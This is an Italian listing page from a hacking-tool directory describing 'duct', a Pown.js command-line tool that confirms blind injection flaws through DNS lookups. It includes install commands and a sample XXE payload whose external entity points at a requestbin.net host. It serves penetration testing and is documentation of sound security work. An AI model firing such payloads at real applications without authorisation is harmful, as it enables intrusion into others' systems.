Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
duct — Strumento essenziale per trovare attacchi di blind injection. | Kitploit
Strumenti/GitHubGitHub/pownjs/duct
Sfruttamento di Applicazioni WebRaccolta InformazioniAnalisi DNS
GitHubpownjs/duct

duct

Strumento essenziale per trovare attacchi di blind injection.

Vedi Repository
4913137 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Follow on Twitter NPM Fury

Pown Duct

Strumento essenziale per individuare attacchi di injection ciechi utilizzando canali laterali DNS.

Crediti

Questo strumento fa parte dell'iniziativa open source di secapps.com.

  ___ ___ ___   _   ___ ___  ___
 / __| __/ __| /_\ | _ \ _ \/ __|
 \__ \ _| (__ / _ \|  _/  _/\__ \
 |___/___\___/_/ \_\_| |_|  |___/
  https://secapps.com

NB: Questo strumento sfrutta il servizio http://requestbin.net. Le versioni future utilizzeranno un'infrastruttura dedicata e costruita su misura.

Avvio rapido

Questo strumento è pensato per essere utilizzato come parte di Pown.js ma può essere invocato separatamente come strumento indipendente.

Installa prima Pown come al solito:

$ npm install -g pown@latest

Invoca direttamente da Pown:

$ pown duct

Altrimenti, installa questo modulo localmente dalla radice del tuo progetto:

$ npm install @pown/duct --save

Una volta fatto, invoca pown cli:

$ ./node_modules/.bin/pown-cli duct

Puoi anche usare pown globale per invocare lo strumento localmente:

$ POWN_ROOT=. pown duct

Utilizzo

pown duct <command>

Side-channel attack enabler

Commands:
  pown duct dns  DNS ducting

Options:
  --version  Show version number  [boolean]
  --help     Show help  [boolean]

pown duct dns

pown duct dns

DNS ducting

Options:
  --version  Show version number  [boolean]
  --help     Show help  [boolean]
  --channel  Restore channel  [string]
  --output   Output format  [string] [choices: "string", "hexdump", "json"] [default: "string"]

Tutorial

Ci sono casi in cui dobbiamo eseguire un attacco come SQL injection, XSS, XXE o SSRF ma l'applicazione target non fornisce alcuna indicazione di essere vulnerabile. Un modo per essere sicuri se una vulnerabilità è presente è provare a iniettare un vettore di attacco valido che costringe un resolver DNS a chiedere un dominio controllato. Se la risoluzione ha successo, l'attacco sarà considerato riuscito.

NOTA: Potresti avere familiarità con Burp Collaborator che fornisce un servizio simile per i clienti.

Prima, abbiamo bisogno di un nome DNS usa e getta da risolvere:

$ pown duct dns

screenshot

Usando il DNS fornito, componi il tuo payload. Ad esempio, il seguente potrebbe innescare una risoluzione DNS se è presente una vulnerabilità XXE.

<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY bar SYSTEM "http://showmethemoney.bfa8b8d3c25f09d5429f.d.requestbin.net">
]>
<foo>
&bar;
</foo>

Se l'attacco ha successo, riceveremo un messaggio nel terminale.

screenshot

Scarica lo strumento